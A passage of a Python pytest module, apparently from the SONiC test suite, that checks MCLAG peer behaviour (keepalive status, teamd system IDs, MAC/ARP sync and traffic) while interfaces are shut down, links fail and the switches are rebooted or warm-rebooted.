reboot(duthost2, localhost)
g_vars.update({'mclag_domain_id': duthost.shell("mclagdctl dump state|grep 'Domain id'")['stdout'].split(":")[-1].strip()})
g_vars.update({'mclag_interfaces': natsorted(duthost.shell("mclagdctl dump state|grep 'MCLAG Interface'")['stdout'].split(": ")[-1].split(","))})
g_vars.update({'peer_link_interface': duthost.shell("mclagdctl dump state|grep 'Peer Link Interface'")['stdout'].split(":")[-1].strip()})
yield
# teardown on ptf
ptfhost.shell("/tmp/mclag/mclag_ptf.sh delete_portchannel{}".format("_"+test_scenario if test_scenario == "l2" else ""))
# teardown on dut
duthost.shell("mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json")
duthost.shell("systemctl disable iccpd")
reboot(duthost, localhost)
duthost2.shell("mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json")
duthost2.shell("systemctl disable iccpd")
reboot(duthost2, localhost)
@pytest.fixture(scope="class", autouse=False)
def fdb_neigh_flush(duthost, duthost2):
duthost.shell("fdbclear; ip neigh flush all")
duthost2.shell("fdbclear; ip neigh flush all")
time.sleep(10)
@pytest.fixture(scope="function")
def basic_traffic_check(request, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, request.instance.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.fixture(scope="function")
def syncheck(request, duthost, duthost2):
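"""Verify MAC/ARP consistency between the two MCLAG peers.

Entries learned on MCLAG interfaces must be identical on both devices. When
'orphan_ports' is set, entries learned on one DUT's orphan ports must appear on
the other DUT pointing at the peer link interface.
"""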
orphan_ports = request.param['orphan_ports']
vlans = eval(duthost.shell("sonic-cfggen -d --var-json VLAN")['stdout']).keys()
res = False
for vlan in [v.split('Vlan')[-1] for v in vlans]:
for module in ['mac', 'arp']:
if module == 'mac':
cmd = "show mac -v %s|grep %s|awk '{print $3,$4}'" % (vlan, vlan)
elif module == 'arp':
cmd = "show arp|grep %s|awk '{print $1,$3}'" % vlan
dut1_port_item_map = {}
dut2_port_item_map = {}
dut1_entry = duthost.shell(cmd)['stdout_lines']
dut2_entry = duthost2.shell(cmd)['stdout_lines']
assert dut1_entry, "Cannot get DUT1 {} entry".format(module)
assert dut2_entry, "Cannot get DUT2 {} entry".format(module)
server_mac = g_vars['dut1_server_mac'] + g_vars['dut2_server_mac']
for entry in dut1_entry:
port = entry.split()[-1]
if (module == "mac" and entry.split()[0] in server_mac) or module == "arp":
item = entry.split()[0]
else:
continue
dut1_port_item_map.setdefault(port, []).append(item)
for entry in dut2_entry:
port = entry.split()[-1]
if (module == "mac" and entry.split()[0] in server_mac) or module == "arp":
item = entry.split()[0]
else:
continue
dut2_port_item_map.setdefault(port, []).append(item)
dut1_orphan_port_item = []
for port in dut1_port_item_map:
# check mclag interfaces
if "PortChannel" in port and port != g_vars['peer_link_interface']:
res = natsorted(dut1_port_item_map[port]) == natsorted(dut2_port_item_map[port])
assert res, "{} learned on mclag should be synced between mclag active and standby devices".format(module)
if orphan_ports:
dut1_orphan_port_item = []
for port in dut1_port_item_map:
if "Ethernet" in port:
for item in dut1_port_item_map[port]:
dut1_orphan_port_item.append(item)
res = natsorted(dut1_orphan_port_item) == natsorted(dut2_port_item_map[g_vars['peer_link_interface']])
# check DUT1 orphan ports
assert res, "{} learned on DUT1 orphan port should be pointed to peer link on DUT2".format(module)
dut2_orphan_port_item = []
for port in dut2_port_item_map:
if "Ethernet" in port:
for item in dut2_port_item_map[port]:
dut2_orphan_port_item.append(item)
res = natsorted(dut2_orphan_port_item) == natsorted(dut1_port_item_map[g_vars['peer_link_interface']])
# check DUT2 orphan ports
assert res, "{} learned on DUT2 orphan port should be pointed to peer link on DUT1".format(module)
class TestCase1_VerifyMclagStatus():
def test_check_keepalive_link(self, duthost, duthost2):
duthost.shell("ping {} -c 3 -f -W 2".format(mclag_peer_ip.ip))
status = duthost.shell("mclagdctl -i {} dump state|grep keepalive".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert status == "OK", "MCLAG keepalive status should be OK on dut1"
status = duthost2.shell("mclagdctl -i {} dump state|grep keepalive".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert status == "OK", "MCLAG keepalive status should be OK on dut2"
def test_check_teamd_system_id(self, duthost, duthost2):
for lag in g_vars['mclag_interfaces']:
dut1_sys_id = duthost.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut1_sys_id == dut2_sys_id, "Mclag standby device {} system ID should be the same as the active device's".format(lag)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
pass
class TestCase2_MclagMemberPortStatusChange():
@pytest.fixture(scope="function")
def setup_mclag_interface_member(self, duthost, duthost2):
# shutdown active's port joined to first mclag interface and standby's port joined to last
dut1_team_cfg = duthost.shell("teamdctl {} config dump".format(g_vars['mclag_interfaces'][0]))['stdout']
dut2_team_cfg = duthost2.shell("teamdctl {} config dump".format(g_vars['mclag_interfaces'][-1]))['stdout']
dut1_team_port = json.loads(dut1_team_cfg)['ports'].keys()
dut2_team_port = json.loads(dut2_team_cfg)['ports'].keys()
for port1, port2 in zip(dut1_team_port, dut2_team_port):
duthost.shell("config interface shutdown {}".format(port1))
duthost2.shell("config interface shutdown {}".format(port2))
time.sleep(5)
yield
for port1,port2 in zip(dut1_team_port, dut2_team_port):
duthost.shell("config interface startup {}".format(port1))
duthost2.shell("config interface startup {}".format(port2))
time.sleep(5)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_mclag_interface_member")
def test_mclag_member_port_down(self, duthost, duthost2, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": [int(g_vars['mclag_interfaces'][0].strip("PortChannel"))-1, len(g_vars['dut1_all_interfaces'])+int(g_vars['mclag_interfaces'][-1].strip("PortChannel"))-1]
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
# verify mac pointed to peer link after mclag member port down
# DUT1 mclag member port down
dut1_mac = (g_vars['ptf_mac_prefix']+"{:02x}".format(int(g_vars['mclag_interfaces'][0].strip("PortChannel"))-1))
dut1_port = duthost.shell("show mac|grep -i %s|awk '{print $4}'" % dut1_mac)['stdout']
assert dut1_port == g_vars['peer_link_interface'], \
"Mac {} on {} should be pointed to peer link after DUT1 mclag member port down".format(dut1_mac, g_vars['mclag_interfaces'][0])
# DUT2 mclag member port down
dut2_mac = (g_vars['ptf_mac_prefix']+"{:02x}".format(int(g_vars['mclag_interfaces'][-1].strip("PortChannel"))-1))
dut2_port = duthost2.shell("show mac|grep -i %s|awk '{print $4}'" % dut2_mac)['stdout']
assert dut2_port == g_vars['peer_link_interface'], \
"Mac {} on {} should be pointed to peer link after DUT2 mclag member port down".format(dut2_mac, g_vars['mclag_interfaces'][-1])
# verify mac age flag changes after mclag member port down
# DUT1 mclag member port down
dut1_age_flag = duthost.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], dut1_mac))['stdout']
assert dut1_age_flag == "L", "Mac previously learned on the DUT1 down port should have the 'L' age flag"
dut2_age_flag = duthost2.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], dut1_mac))['stdout']
assert dut2_age_flag == "P", "Mac learned from the peer link on DUT2 should have the 'P' age flag"
# DUT2 mclag member port down
dut2_age_flag2 = duthost2.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], dut2_mac))['stdout']
assert dut2_age_flag2 == "L", "Mac previously learned on the DUT2 down port should have the 'L' age flag"
dut1_age_flag2 = duthost.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], dut2_mac))['stdout']
assert dut1_age_flag2 == "P", "Mac learned from the peer link on DUT1 should have the 'P' age flag"
# verify arp pointed to peer link after mclag member port down
# DUT1 mclag member port down
dut1_vmember = duthost.shell("sonic-cfggen -d --var-json VLAN_MEMBER")['stdout']
for k in json.loads(dut1_vmember):
if g_vars['mclag_interfaces'][0] in k:
vlan = k.split("|")[0]
dut1_vlan_intf = duthost.shell("sonic-cfggen -d --var-json VLAN_INTERFACE")['stdout']
for k in json.loads(dut1_vlan_intf):
if vlan+"|" in k:
vlan_ip = ipaddress.IPNetwork(k.split("|")[-1])
dut1_arp = vlan_ip.network + 256*int(g_vars['mclag_interfaces'][0].strip("PortChannel")) + 2
dut1_arp_port = duthost.shell("show arp|grep %s|awk '{print $3}'" % dut1_arp)['stdout']
assert dut1_arp_port == g_vars['peer_link_interface'], \
"Arp {} on {} should be pointed to peer link after DUT1 mclag member port down".format(dut1_arp, g_vars['mclag_interfaces'][0])
# DUT2 mclag member port down
dut2_vmember = duthost2.shell("sonic-cfggen -d --var-json VLAN_MEMBER")['stdout']
for k in json.loads(dut2_vmember):
if g_vars['mclag_interfaces'][-1] in k:
vlan = k.split("|")[0]
dut2_vlan_intf = duthost2.shell("sonic-cfggen -d --var-json VLAN_INTERFACE")['stdout']
for k in json.loads(dut2_vlan_intf):
if vlan+"|" in k:
vlan_ip = ipaddress.IPNetwork(k.split("|")[-1])
dut2_arp = vlan_ip.network + 256*int(g_vars['mclag_interfaces'][-1].strip("PortChannel")) + 2
dut2_arp_port = duthost2.shell("show arp|grep %s|awk '{print $3}'" % dut2_arp)['stdout']
assert dut2_arp_port == g_vars['peer_link_interface'], \
"Arp {} on {} should be pointed to peer link after DUT2 mclag member port down".format(dut2_arp, g_vars['mclag_interfaces'][-1])
def test_mclag_member_port_up(self, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase3_PeerLinkStatusChange():
def test_traffic_between_servers(self, basic_traffic_check):
pass
def test_peer_link_interface_down(self, duthost, duthost2, ptfhost, testbed):
duthost.shell("config interface shutdown {}".format(g_vars['peer_link_interface']))
duthost2.shell("config interface shutdown {}".format(g_vars['peer_link_interface']))
time.sleep(5)
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after peer link down"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": g_vars['dut1_orphan_ports'] + g_vars['dut2_orphan_ports']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': False}], indirect=True)
def test_syncheck_on_mclag_interface(self, syncheck):
# verify mac and arp sync on mclag interfaces
pass
def test_peer_link_interface_up(self, duthost, duthost2, ptfhost, testbed):
duthost.shell("config interface startup {}".format(g_vars['peer_link_interface']))
duthost2.shell("config interface startup {}".format(g_vars['peer_link_interface']))
time.sleep(5)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase4_KeepaliveLinkStatusChange():
keepalive_intf = []
@pytest.fixture(scope="function")
def setup_keepalive_link(self, duthost):
res = duthost.shell("show ip route {}|grep '*'".format(mclag_peer_ip.ip))['stdout']
self.keepalive_intf = [entry.split("via ")[-1] for entry in res.split("\n")] if "via" in res else [res.split(", ")[-1]]
for intf in self.keepalive_intf:
duthost.shell("config interface shutdown {}".format(intf))
time.sleep(20) # default keepalive timeout is 15s
yield
for intf in self.keepalive_intf:
duthost.shell("config interface startup {}".format(intf))
time.sleep(20)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_keepalive_link")
def test_keepalive_link_down(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "ERROR", "Mclag keepalive status should be ERROR on both peers after keepalive link down"
for lag in g_vars['mclag_interfaces']:
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut2_sys_id == g_vars['dut2_router_mac'], "Mclag standby device {} system ID should be recovered to the default".format(lag)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": g_vars['dut2_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
for module in ['mac', 'arp']:
cmd = "show {}|grep {}".format(module, g_vars['peer_link_interface'])
res1 = duthost.shell(cmd, module_ignore_errors=True)['stdout']
res2 = duthost2.shell(cmd, module_ignore_errors=True)['stdout']
assert g_vars['peer_link_interface'] not in res1 + res2, "Mac and arp should be removed after keepalive link down"
def test_keepalive_link_up(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after keepalive link up"
for lag in g_vars['mclag_interfaces']:
dut1_sys_id = duthost.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut1_sys_id == dut2_sys_id, "Mclag {} system ID should be the same after keepalive link up".format(lag)
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase5_PeerKeepaliveBothStatusChange():
keepalive_intf = []
@pytest.fixture(scope="function")
def setup_peer_keepalive_link(self, duthost):
duthost.shell("config interface shutdown {}".format(g_vars['peer_link_interface']))
res = duthost.shell("show ip route {}|grep '*'".format(mclag_peer_ip.ip))['stdout']
self.keepalive_intf = [entry.split("via ")[-1] for entry in res.split("\n")] if "via" in res else [res.split(", ")[-1]]
for intf in self.keepalive_intf:
duthost.shell("config interface shutdown {}".format(intf))
time.sleep(20)
yield
duthost.shell("config interface startup {}".format(g_vars['peer_link_interface']))
for intf in self.keepalive_intf:
duthost.shell("config interface startup {}".format(intf))
time.sleep(20)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_peer_keepalive_link")
def test_peer_keepalive_link_down(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "ERROR", "Mclag keepalive status should be ERROR on both peers after peer and keepalive link down"
for lag in g_vars['mclag_interfaces']:
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut2_sys_id == g_vars['dut2_router_mac'], "Mclag standby device {} system ID should be recovered to the default".format(lag)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": g_vars['dut1_orphan_ports'] + g_vars['dut2_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
for module in ['mac', 'arp']:
cmd = "show {}|grep {}".format(module, g_vars['peer_link_interface'])
res1 = duthost.shell(cmd, module_ignore_errors=True)['stdout']
res2 = duthost2.shell(cmd, module_ignore_errors=True)['stdout']
assert g_vars['peer_link_interface'] not in res1 + res2, "Mac and arp should be removed after peer and keepalive link down"
def test_peer_keepalive_link_up(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after peer and keepalive link up"
for lag in g_vars['mclag_interfaces']:
dut1_sys_id = duthost.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
dut2_sys_id = duthost2.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
assert dut1_sys_id == dut2_sys_id, "Mclag {} system ID should be the same after peer and keepalive link up".format(lag)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase6_ActiveDevStatusChange():
@pytest.fixture(scope="function")
def setup_reboot_active(self, duthost, localhost, delay=10, timeout=180):
dut1_ports = natsorted(g_vars['dut1_port_alias']['port_name_map'].keys())[:len(g_vars['dut1_all_interfaces'])]
for port in dut1_ports:
duthost.shell("config interface shutdown {}".format(port))
duthost.shell("config save -y")
duthost.shell("nohup reboot &", module_ignore_errors=True)
time.sleep(20)
yield
# waiting for ssh to startup
dut_ip = duthost.host.options['inventory_manager'].get_host(duthost.hostname).address
localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
wait_until(120, 10, duthost.critical_services_fully_started)
for port in dut1_ports:
duthost.shell("config interface startup {}".format(port))
duthost.shell("config save -y")
time.sleep(5)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_reboot_active")
def test_active_down(self, duthost, duthost2, ptfhost, testbed):
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut2_status == "ERROR", "Mclag keepalive status should be ERROR on standby after active reboot"
# before sending packets, wait until the standby MCLAG re-aggregates successfully after the router_mac change
assert wait_until(150, 10, check_teamd_status, duthost2, g_vars['dut2_router_mac']), \
"Standby teamd status should be up and sysid should changes to standby's default mac"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut2_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": g_vars['dut1_all_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
for module in ['mac', 'arp']:
cmd = "show {}|grep {}".format(module, g_vars['peer_link_interface'])
res = duthost2.shell(cmd, module_ignore_errors=True)['stdout']
assert g_vars['peer_link_interface'] not in res, "{} pointed to peer link should be removed after active reboot".format(module)
def test_active_up(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after the active comes back up"
# before sending packets, wait until the standby MCLAG re-aggregates successfully after the router_mac change
assert wait_until(150, 10, check_teamd_status, duthost2, g_vars['dut1_router_mac']), \
"Standby teamd status should be up and sysid should be same as active's mac"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase7_StandbyDevStatusChange():
@pytest.fixture(scope="function")
def setup_reboot_standby(self, duthost2, localhost, delay=10, timeout=180):
dut2_ports = natsorted(g_vars['dut2_port_alias']['port_name_map'].keys())[:len(g_vars['dut2_all_interfaces'])]
for port in dut2_ports:
duthost2.shell("config interface shutdown {}".format(port))
duthost2.shell("config save -y")
duthost2.shell("nohup reboot &", module_ignore_errors=True)
time.sleep(20)
yield
# waiting for ssh to startup
dut_ip = duthost2.host.options['inventory_manager'].get_host(duthost2.hostname).address
localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
wait_until(120, 10, duthost2.critical_services_fully_started)
for port in dut2_ports:
duthost2.shell("config interface startup {}".format(port))
duthost2.shell("config save -y")
time.sleep(5)
def test_traffic_between_servers(self, basic_traffic_check):
pass
@pytest.mark.usefixtures("setup_reboot_standby")
def test_standby_down(self, duthost, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == "ERROR", "Mclag keepalive status should be ERROR on active after standby reboot"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": g_vars['dut2_all_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
for module in ['mac', 'arp']:
cmd = "show {}|grep {}".format(module, g_vars['peer_link_interface'])
res = duthost.shell(cmd, module_ignore_errors=True)['stdout']
assert g_vars['peer_link_interface'] not in res, "{} pointed to peer link should be removed after standby reboot".format(module)
def test_standby_up(self, duthost, duthost2, ptfhost, testbed):
dut1_status = duthost.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
dut2_status = duthost2.shell("mclagdctl -i {} dump state|grep 'keepalive'".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert dut1_status == dut2_status == "OK", "Mclag keepalive status should be OK on both peers after the standby comes back up"
# before sending packets, wait until the standby MCLAG re-aggregates successfully after the router_mac change
assert wait_until(150, 10, check_teamd_status, duthost2, g_vars['dut1_router_mac']), \
"Standby teamd status should be up and sysid should be same as active's mac"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck(self, syncheck):
# verify mac and arp sync
pass
class TestCase8_ActiveDevWarmreboot():
ev = threading.Event()
ev.set()
@pytest.fixture(scope="class", autouse=True)
def stop_bg_traffic(self):
yield
self.ev.clear()
def test_traffic_between_servers(self, basic_traffic_check):
pass
def test_traffic_during_warmreboot(self, localhost, duthost, ptfhost, testbed, delay=10, timeout=180):
exc_que = Queue.Queue()
params = {
"casename": self.__class__.__name__,
"event": self.ev,
"ptf_runner": ptf_runner,
"exc_queue": exc_que, # use for store exception infos
"host": ptfhost,
"testdir": "ptftests",
"testname": "mclag_test.MclagTest",
"platform_dir": "ptftests",
"params": {
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": []
}
}
bg_traffic = threading.Thread(target=continuous_traffic_check, kwargs=params)
# start sending traffic continuously in the background
bg_traffic.start()
# warm-reboot
duthost.shell("nohup warm-reboot >/dev/null 2>&1 &")
# waiting for ssh to absent then startup
dut_ip = duthost.host.options['inventory_manager'].get_host(duthost.hostname).address
res = localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='absent',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout,
module_ignore_errors=True)
if res.is_failed:
raise Exception('DUT did not warm-reboot, maybe orchagent_restart_check failed')
localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
finalizer_state = wait_until(300, 10, check_warm_status, duthost)
# stop sending traffic
self.ev.clear()
assert finalizer_state, "Warm reboot is expected to finish within 300s"
traffic_res = True
if exc_que.qsize() != 0:
traffic_res = False
_, exc_obj, _ = exc_que.get()
assert traffic_res, "Traffic Test Failed \n {}".format(str(exc_obj))
# basic check after warmreboot
assert duthost.critical_services_fully_started()
time.sleep(30)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck_after_warmreboot(self, syncheck):
# verify mac and arp sync
pass
class TestCase9_StandbyDevWarmreboot():
ev = threading.Event()
ev.set()
@pytest.fixture(scope="class", autouse=True)
def stop_bg_traffic(self):
yield
self.ev.clear()
def test_traffic_between_servers(self, basic_traffic_check):
pass
def test_traffic_during_warmreboot(self, localhost, duthost2, ptfhost, testbed, delay=10, timeout=180):
exc_que = Queue.Queue()
params = {
"casename": self.__class__.__name__,
"event": self.ev,
"ptf_runner": ptf_runner,
"exc_queue": exc_que, # use for store exception infos
"host": ptfhost,
"testdir": "ptftests",
"testname": "mclag_test.MclagTest",
"platform_dir": "ptftests",
"params": {
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
